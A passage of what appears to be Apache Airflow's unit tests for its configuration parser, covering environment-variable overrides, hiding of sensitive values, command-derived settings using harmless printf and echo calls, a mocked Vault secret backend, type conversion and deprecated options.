AIRFLOW__KUBERNETES_ENVIRONMENT_VARIABLES__AIRFLOW__TESTSECTION__TESTKEY='nested' ): opt = conf.get('kubernetes_environment_variables', 'AIRFLOW__TESTSECTION__TESTKEY') self.assertEqual(opt, 'nested') @mock.patch.dict( 'os.environ', AIRFLOW__KUBERNETES_ENVIRONMENT_VARIABLES__AIRFLOW__TESTSECTION__TESTKEY='nested' ) @conf_vars({("core", "percent"): "with%%inside"}) def test_conf_as_dict(self): cfg_dict = conf.as_dict() # test that configs are picked up self.assertEqual(cfg_dict['core']['unit_test_mode'], 'True') self.assertEqual(cfg_dict['core']['percent'], 'with%inside') # test env vars self.assertEqual(cfg_dict['testsection']['testkey'], '< hidden >') self.assertEqual( cfg_dict['kubernetes_environment_variables']['AIRFLOW__TESTSECTION__TESTKEY'], '< hidden >' ) def test_conf_as_dict_source(self): # test display_source cfg_dict = conf.as_dict(display_source=True) self.assertEqual(cfg_dict['core']['load_examples'][1], 'airflow.cfg') self.assertEqual(cfg_dict['core']['load_default_connections'][1], 'airflow.cfg') self.assertEqual(cfg_dict['testsection']['testkey'], ('< hidden >', 'env var')) def test_conf_as_dict_sensitive(self): # test display_sensitive cfg_dict = conf.as_dict(display_sensitive=True) self.assertEqual(cfg_dict['testsection']['testkey'], 'testvalue') self.assertEqual(cfg_dict['testsection']['testpercent'], 'with%percent') # test display_source and display_sensitive cfg_dict = conf.as_dict(display_sensitive=True, display_source=True) self.assertEqual(cfg_dict['testsection']['testkey'], ('testvalue', 'env var')) @conf_vars({("core", "percent"): "with%%inside"}) def test_conf_as_dict_raw(self): # test display_sensitive cfg_dict = conf.as_dict(raw=True, display_sensitive=True) self.assertEqual(cfg_dict['testsection']['testkey'], 'testvalue') # Values with '%' in them should be escaped self.assertEqual(cfg_dict['testsection']['testpercent'], 'with%%percent') self.assertEqual(cfg_dict['core']['percent'], 'with%%inside') def test_conf_as_dict_exclude_env(self): # test display_sensitive cfg_dict = conf.as_dict(include_env=False, display_sensitive=True) # Since testsection is only created from env vars, it shouldn't be # present at all if we don't ask for env vars to be included. self.assertNotIn('testsection', cfg_dict) def test_command_precedence(self): test_config = '''[test] key1 = hello key2_cmd = printf cmd_result key3 = airflow key4_cmd = printf key4_result ''' test_config_default = '''[test] key1 = awesome key2 = airflow [another] key6 = value6 ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) test_conf.sensitive_config_values = test_conf.sensitive_config_values | { ('test', 'key2'), ('test', 'key4'), } self.assertEqual('hello', test_conf.get('test', 'key1')) self.assertEqual('cmd_result', test_conf.get('test', 'key2')) self.assertEqual('airflow', test_conf.get('test', 'key3')) self.assertEqual('key4_result', test_conf.get('test', 'key4')) self.assertEqual('value6', test_conf.get('another', 'key6')) self.assertEqual('hello', test_conf.get('test', 'key1', fallback='fb')) self.assertEqual('value6', test_conf.get('another', 'key6', fallback='fb')) self.assertEqual('fb', test_conf.get('another', 'key7', fallback='fb')) self.assertEqual(True, test_conf.getboolean('another', 'key8_boolean', fallback='True')) self.assertEqual(10, test_conf.getint('another', 'key8_int', fallback='10')) self.assertEqual(1.0, test_conf.getfloat('another', 'key8_float', fallback='1')) self.assertTrue(test_conf.has_option('test', 'key1')) self.assertTrue(test_conf.has_option('test', 'key2')) self.assertTrue(test_conf.has_option('test', 'key3')) self.assertTrue(test_conf.has_option('test', 'key4')) self.assertFalse(test_conf.has_option('test', 'key5')) self.assertTrue(test_conf.has_option('another', 'key6')) cfg_dict = test_conf.as_dict(display_sensitive=True) self.assertEqual('cmd_result', cfg_dict['test']['key2']) self.assertNotIn('key2_cmd', cfg_dict['test']) # If we exclude _cmds then we should still see the commands to run, not # their values cfg_dict = test_conf.as_dict(include_cmds=False, display_sensitive=True) self.assertNotIn('key4', cfg_dict['test']) self.assertEqual('printf key4_result', cfg_dict['test']['key4_cmd']) @mock.patch("airflow.providers.hashicorp._internal_client.vault_client.hvac") @conf_vars( { ("secrets", "backend"): "airflow.providers.hashicorp.secrets.vault.VaultBackend", ("secrets", "backend_kwargs"): '{"url": "http://127.0.0.1:8200", "token": "token"}', } ) def test_config_from_secret_backend(self, mock_hvac): """Get Config Value from a Secret Backend""" mock_client = mock.MagicMock() mock_hvac.Client.return_value = mock_client mock_client.secrets.kv.v2.read_secret_version.return_value = { 'request_id': '2d48a2ad-6bcb-e5b6-429d-da35fdf31f56', 'lease_id': '', 'renewable': False, 'lease_duration': 0, 'data': { 'data': {'value': 'sqlite:////Users/airflow/airflow/airflow.db'}, 'metadata': { 'created_time': '2020-03-28T02:10:54.301784Z', 'deletion_time': '', 'destroyed': False, 'version': 1, }, }, 'wrap_info': None, 'warnings': None, 'auth': None, } test_config = '''[test] sql_alchemy_conn_secret = sql_alchemy_conn ''' test_config_default = '''[test] sql_alchemy_conn = airflow ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) test_conf.sensitive_config_values = test_conf.sensitive_config_values | { ('test', 'sql_alchemy_conn'), } self.assertEqual( 'sqlite:////Users/airflow/airflow/airflow.db', test_conf.get('test', 'sql_alchemy_conn') ) def test_getboolean(self): """Test AirflowConfigParser.getboolean""" test_config = """ [type_validation] key1 = non_bool_value [true] key2 = t key3 = true key4 = 1 [false] key5 = f key6 = false key7 = 0 [inline-comment] key8 = true #123 """ test_conf = AirflowConfigParser(default_config=test_config) with self.assertRaisesRegex( AirflowConfigException, re.escape( 'Failed to convert value to bool. Please check "key1" key in "type_validation" section. ' 'Current value: "non_bool_value".' ), ): test_conf.getboolean('type_validation', 'key1') self.assertTrue(isinstance(test_conf.getboolean('true', 'key3'), bool)) self.assertEqual(True, test_conf.getboolean('true', 'key2')) self.assertEqual(True, test_conf.getboolean('true', 'key3')) self.assertEqual(True, test_conf.getboolean('true', 'key4')) self.assertEqual(False, test_conf.getboolean('false', 'key5')) self.assertEqual(False, test_conf.getboolean('false', 'key6')) self.assertEqual(False, test_conf.getboolean('false', 'key7')) self.assertEqual(True, test_conf.getboolean('inline-comment', 'key8')) def test_getint(self): """Test AirflowConfigParser.getint""" test_config = """ [invalid] key1 = str [valid] key2 = 1 """ test_conf = AirflowConfigParser(default_config=test_config) with self.assertRaisesRegex( AirflowConfigException, re.escape( 'Failed to convert value to int. Please check "key1" key in "invalid" section. ' 'Current value: "str".' ), ): test_conf.getint('invalid', 'key1') self.assertTrue(isinstance(test_conf.getint('valid', 'key2'), int)) self.assertEqual(1, test_conf.getint('valid', 'key2')) def test_getfloat(self): """Test AirflowConfigParser.getfloat""" test_config = """ [invalid] key1 = str [valid] key2 = 1.23 """ test_conf = AirflowConfigParser(default_config=test_config) with self.assertRaisesRegex( AirflowConfigException, re.escape( 'Failed to convert value to float. Please check "key1" key in "invalid" section. ' 'Current value: "str".' ), ): test_conf.getfloat('invalid', 'key1') self.assertTrue(isinstance(test_conf.getfloat('valid', 'key2'), float)) self.assertEqual(1.23, test_conf.getfloat('valid', 'key2')) def test_has_option(self): test_config = '''[test] key1 = value1 ''' test_conf = AirflowConfigParser() test_conf.read_string(test_config) self.assertTrue(test_conf.has_option('test', 'key1')) self.assertFalse(test_conf.has_option('test', 'key_not_exists')) self.assertFalse(test_conf.has_option('section_not_exists', 'key1')) def test_remove_option(self): test_config = '''[test] key1 = hello key2 = airflow ''' test_config_default = '''[test] key1 = awesome key2 = airflow ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) self.assertEqual('hello', test_conf.get('test', 'key1')) test_conf.remove_option('test', 'key1', remove_default=False) self.assertEqual('awesome', test_conf.get('test', 'key1')) test_conf.remove_option('test', 'key2') self.assertFalse(test_conf.has_option('test', 'key2')) def test_getsection(self): test_config = ''' [test] key1 = hello ''' test_config_default = ''' [test] key1 = awesome key2 = airflow [testsection] key3 = value3 ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) self.assertEqual(OrderedDict([('key1', 'hello'), ('key2', 'airflow')]), test_conf.getsection('test')) self.assertEqual( OrderedDict([('key3', 'value3'), ('testkey', 'testvalue'), ('testpercent', 'with%percent')]), test_conf.getsection('testsection'), ) def test_get_section_should_respect_cmd_env_variable(self): with tempfile.NamedTemporaryFile(delete=False) as cmd_file: cmd_file.write(b"#!/usr/bin/env bash\n") cmd_file.write(b"echo -n difficult_unpredictable_cat_password\n") cmd_file.flush() os.chmod(cmd_file.name, 0o0555) cmd_file.close() with mock.patch.dict("os.environ", {"AIRFLOW__KUBERNETES__GIT_PASSWORD_CMD": cmd_file.name}): content = conf.getsection("kubernetes") os.unlink(cmd_file.name) self.assertEqual(content["git_password"], "difficult_unpredictable_cat_password") def test_kubernetes_environment_variables_section(self): test_config = ''' [kubernetes_environment_variables] key1 = hello AIRFLOW_HOME = /root/airflow ''' test_config_default = ''' [kubernetes_environment_variables] ''' test_conf = AirflowConfigParser(default_config=parameterized_config(test_config_default)) test_conf.read_string(test_config) self.assertEqual( OrderedDict([('key1', 'hello'), ('AIRFLOW_HOME', '/root/airflow')]), test_conf.getsection('kubernetes_environment_variables'), ) def test_broker_transport_options(self): section_dict = conf.getsection("celery_broker_transport_options") self.assertTrue(isinstance(section_dict['visibility_timeout'], int)) self.assertTrue(isinstance(section_dict['_test_only_bool'], bool)) self.assertTrue(isinstance(section_dict['_test_only_float'], float)) self.assertTrue(isinstance(section_dict['_test_only_string'], str)) @conf_vars( { ("celery", "worker_concurrency"): None, ("celery", "celeryd_concurrency"): None, } ) def test_deprecated_options(self): # Guarantee we have a deprecated setting, so we test the deprecation # lookup even if we remove this explicit fallback conf.deprecated_options = { ('celery', 'worker_concurrency'): ('celery', 'celeryd_concurrency'), } # Remove it so we are sure we use the right setting conf.remove_option('celery', 'worker_concurrency') with self.assertWarns(DeprecationWarning): with mock.patch.dict('os.environ', AIRFLOW__CELERY__CELERYD_CONCURRENCY="99"): self.assertEqual(conf.getint('celery', 'worker_concurrency'), 99) with self.assertWarns(DeprecationWarning), conf_vars({('celery', 'celeryd_concurrency'): '99'}): self.assertEqual(conf.getint('celery', 'worker_concurrency'), 99) @conf_vars( { ('logging', 'logging_level'): None, ('core', 'logging_level'): None, } ) def test_deprecated_options_with_new_section(self): # Guarantee we have a deprecated setting, so we test the deprecation # lookup even if we remove this explicit fallback conf.deprecated_options = { ('logging', 'logging_level'): ('core', 'logging_level'), } # Remove it so we are sure we use the right setting conf.remove_option('core', 'logging_level') conf.remove_option('logging', 'logging_level') with self.assertWarns(DeprecationWarning): with mock.patch.dict('os.environ', AIRFLOW__CORE__LOGGING_LEVEL="VALUE"): self.assertEqual(conf.get('logging', 'logging_level'), "VALUE") with self.assertWarns(DeprecationWarning), conf_vars({('core', 'logging_level'): 'VALUE'}): self.assertEqual(conf.get('logging', 'logging_level'), "VALUE") @conf_vars( { ("celery", "result_backend"): None, ("celery", "celery_result_backend"): None, ("celery", "celery_result_backend_cmd"): None, } ) def test_deprecated_options_cmd(self): # Guarantee we have a deprecated setting, so we test the deprecation # lookup even if we remove this explicit fallback conf.deprecated_options[('celery', "result_backend")] = ('celery', 'celery_result_backend') conf.sensitive_config_values.add(('celery', 'celery_result_backend')) conf.remove_option('celery', 'result_backend') with conf_vars({('celery', 'celery_result_backend_cmd'): '/bin/echo 99'}): with self.assertWarns(DeprecationWarning): tmp = None if 'AIRFLOW__CELERY__RESULT_BACKEND' in os.environ: tmp = os.environ.pop('AIRFLOW__CELERY__RESULT_BACKEND') self.assertEqual(conf.getint('celery', 'result_backend'), 99) if tmp: os.environ['AIRFLOW__CELERY__RESULT_BACKEND'] = tmp def test_deprecated_values(self): def make_config(): test_conf = AirflowConfigParser(default_config='') # Guarantee we have a deprecated setting, so we test the deprecation # lookup even if we remove this explicit fallback test_conf.deprecated_values = { 'core': { 'hostname_callable': (re.compile(r':'), r'.', '2.1'), }, } test_conf.read_dict( { 'core': { 'executor': 'SequentialExecutor', 'sql_alchemy_conn': 'sqlite://', 'hostname_callable': 'socket:getfqdn', }, } ) return test_conf with self.assertWarns(FutureWarning): test_conf = make_config() self.assertEqual(test_conf.get('core', 'hostname_callable'), 'socket.getfqdn') with self.assertWarns(FutureWarning): with unittest.mock.patch.dict('os.environ', AIRFLOW__CORE__HOSTNAME_CALLABLE='socket:getfqdn'): test_conf = make_config() self.assertEqual(test_conf.get('core', 'hostname_callable'), 'socket.getfqdn') with reset_warning_registry(): with warnings.catch_warnings(record=True) as warning: with unittest.mock.patch.dict( 'os.environ', AIRFLOW__CORE__HOSTNAME_CALLABLE='CarrierPigeon', ): test_conf = make_config() self.assertEqual(test_conf.get('core', 'hostname_callable'), 'CarrierPigeon') self.assertListEqual([], warning) def test_deprecated_funcs(self): for func in [ 'load_test_config', 'get', 'getboolean', 'getfloat', 'getint', 'has_option', 'remove_option', 'as_dict', 'set', ]: with mock.patch(f'airflow.configuration.conf.{func}') as mock_method: with self.assertWarns(DeprecationWarning): getattr(configuration, func)() mock_method.assert_called_once() def test_command_from_env(self): test_cmdenv_config = '''[testcmdenv] itsacommand = NOT OK notacommand = OK ''' test_cmdenv_conf = AirflowConfigParser() test_cmdenv_conf.read_string(test_cmdenv_config) test_cmdenv_conf.sensitive_config_values.add(('testcmdenv', 'itsacommand')) with unittest.mock.patch.dict('os.environ'): # AIRFLOW__TESTCMDENV__ITSACOMMAND_CMD maps to ('testcmdenv', 'itsacommand') in # sensitive_config_values and therefore should return 'OK' from the environment variable's # echo command, and must not return 'NOT OK' from the configuration self.assertEqual(test_cmdenv_conf.get('testcmdenv', 'itsacommand'), 'OK') # AIRFLOW__TESTCMDENV__NOTACOMMAND_CMD maps to no entry in sensitive_config_values and therefore # the option should return 'OK' from the configuration, and must not return 'NOT OK' from # the environment variable's echo command self.assertEqual(test_cmdenv_conf.get('testcmdenv', 'notacommand'), 'OK') def test_parameterized_config_gen(self): cfg = parameterized_config(DEFAULT_CONFIG) # making sure some basic building blocks are present: self.assertIn("[core]", cfg) self.assertIn("dags_folder", cfg) self.assertIn("sql_alchemy_conn", cfg) self.assertIn("fernet_key", cfg) # making sure replacement actually happened self.assertNotIn("{AIRFLOW_HOME}", cfg) self.assertNotIn("{FERNET_KEY}", cfg) def test_config_use_original_when_original_and_fallback_are_present(self): self.assertTrue(conf.has_option("core", "FERNET_KEY")) self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD")) fernet_key = conf.get('core', 'FERNET_KEY') with conf_vars({('core', 'FERNET_KEY_CMD'): 'printf HELLO'}): fallback_fernet_key = conf.get("core", "FERNET_KEY") self.assertEqual(fernet_key, fallback_fernet_key) def test_config_throw_error_when_original_and_fallback_is_absent(self): self.assertTrue(conf.has_option("core", "FERNET_KEY")) self.assertFalse(conf.has_option("core", "FERNET_KEY_CMD")) with conf_vars({('core', 'fernet_key'): None}): with self.assertRaises(AirflowConfigException) as cm: conf.get("core", "FERNET_KEY") exception = str(cm.exception) message = "section/key [core/fernet_key] not found in config" self.assertEqual(message, exception) def test_config_override_original_when_non_empty_envvar_is_provided(self): key = "AIRFLOW__CORE__FERNET_KEY" value = "some value" with mock.patch.dict('os.environ', {key: value}): fernet_key = conf.get('core', 'FERNET_KEY') self.assertEqual(value, fernet_key) def test_config_override_original_when_empty_envvar_is_provided(self): key = "AIRFLOW__CORE__FERNET_KEY" value = "some value" with mock.patch.dict('os.environ', {key: value}): fernet_key = conf.get('core', 'FERNET_KEY') self.assertEqual(value, fernet_key) @mock.patch.dict("os.environ", {"AIRFLOW__CORE__DAGS_FOLDER": "/tmp/test_folder"}) def test_write_should_respect_env_variable(self): with io.StringIO() as string_file: conf.write(string_file) content = string_file.getvalue() self.assertIn("dags_folder = /tmp/test_folder", content) def test_run_command(self): write = r'sys.stdout.buffer.write("\u1000foo".encode("utf8"))' cmd = f'import sys; {write}; sys.stdout.flush()' self.assertEqual(run_command(f"python -c '{cmd}'"), '\u1000foo') self.assertEqual(run_command('echo "foo bar"'), 'foo bar\n') self.assertRaises(AirflowConfigException, run_command, 'bash -c "exit 1"') def test_confirm_unittest_mod(self): self.assertTrue(conf.get('core', 'unit_test_mode')) @conf_vars({("core", "store_serialized_dags"): "True"}) def test_store_dag_code_default_config(self): store_serialized_dags = conf.getboolean('core', 'store_serialized_dags', fallback=False) store_dag_code = conf.getboolean("core", "store_dag_code", fallback=store_serialized_dags) self.assertFalse(conf.has_option("core", "store_dag_code")) self.assertTrue(store_serialized_dags) self.assertTrue(store_dag_code) @conf_vars({("core", "store_serialized_dags"): "True", ("core", "store_dag_code"): "False"}) def test_store_dag_code_config_when_set(self): store_serialized_dags = conf.getboolean('core', 'store_serialized_dags', fallback=False) store_dag_code = conf.getboolean("core", "store_dag_code", fallback=store_serialized_dags) self.assertTrue(conf.has_option("core", "store_dag_code")) self.assertTrue(store_serialized_dags) self.assertFalse(store_dag_code)